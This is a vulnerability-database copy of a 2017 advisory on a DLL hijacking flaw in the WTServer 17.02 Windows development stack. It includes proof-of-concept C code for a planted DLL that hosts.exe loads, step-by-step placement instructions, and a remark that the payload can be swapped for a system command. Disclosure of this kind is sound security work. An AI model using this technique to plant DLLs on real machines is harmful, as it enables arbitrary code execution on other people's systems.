Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

WTServer 17.02 DLL Hijacking

🗓️ 10 Mar 2017 00:00:00Reported by Nassim AsrirType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 75 Views

WTServer-17.02 DLL Loading Arbitrary Code Execution vulnerability in Nginx MariaDB Redis Php development stack for Windows

Code
`[+] Title: WTServer-17.02 - DLL Loading Arbitrary Code Execution  
[+] Credits / Discovery: Nassim Asrir  
[+] Author Email: [email protected]  
[+] Author Company: Henceforth  
  
Vendor:  
===============  
  
http://wtserver.wtriple.com/  
  
  
Download:  
===========  
  
https://sourceforge.net/projects/wtnmp/files/latest/download?source=directory  
  
About Product:  
===============  
  
WTServer - Nginx MariaDB Redis Php development stack for Windows  
  
A lightweight, fast and stable server stack for developing php mysql applications on windows, based on the excellent webserver Nginx. A lighter alternative to XAMPP and WAMP.  
  
  
Package contains:  
- Nginx 1.11.10 web server  
- MariaDB 10.1.21 database server, mysql replacement (32/64bit)  
- Redis 3.2 Cache/NoSql, memcached alternative (64bit)  
- Php 5.6.30 & PHP 7.0.16 & PHP 7.1.2 scripting language (32/64bit)  
- WinSCP SFTP client  
- HTTPS using free LetsEncrypt certificates  
- Composer dependency manager for php  
- Adminer web based database manager  
- Reg.php regular expressions tester  
- WTServer Manager (32/64bit), formerly known as *wt-nmp*   
  
Vulnerability Type:  
===================  
  
DLL Loading Arbitrary Code Execution.  
  
  
Informations:  
===================  
  
The "hosts.exe" program is the vulnerable in WTServer and the vulnerable DLL is "api-ms-win-appmodel-runtime-l1-1-0.dll".  
  
  
POC:  
===================  
Download the POC from github and compile it with "CodeBlocks" or "GCC" .   
  
https://gist.github.com/Nassim-Asrir/8f9a97919e84c4cddc491b317672172b  
  
Data:  
  
// Compile this code and rename it to "api-ms-win-appmodel-runtime-l1-1-0.dll" then copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe"  
// For any informations contact me at: [email protected]  
  
#include "main.h"  
  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
int mes()  
{  
MessageBox(0, "DLL Hijacking Vulnerable", "Nassim Asrir", MB_OK);  
return 0;  
}  
BOOL WINAPI DllMain (  
HANDLE hinstDLL,  
DWORD fdwReason,  
LPVOID lpvReserved)  
{mes();}  
  
  
- Download the POC and compile it and copy it to "C:\WTServer\bin\HostsEditor" then launch "hosts.exe" and you will see the MessageBox or you can modify in the code to launch a System Command (calc or ....) .  
  
  
CVE Reference:  
===============  
  
N/A  
  
  
Tested on:  
===============   
  
Windows 7  
  
Win xp   
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
10 Mar 2017 00:00Current
0.3Low risk
Vulners AI Score0.3
wtservernginxmariadbredisphpwindowsvulnerabilitydll hijackingcode execution
75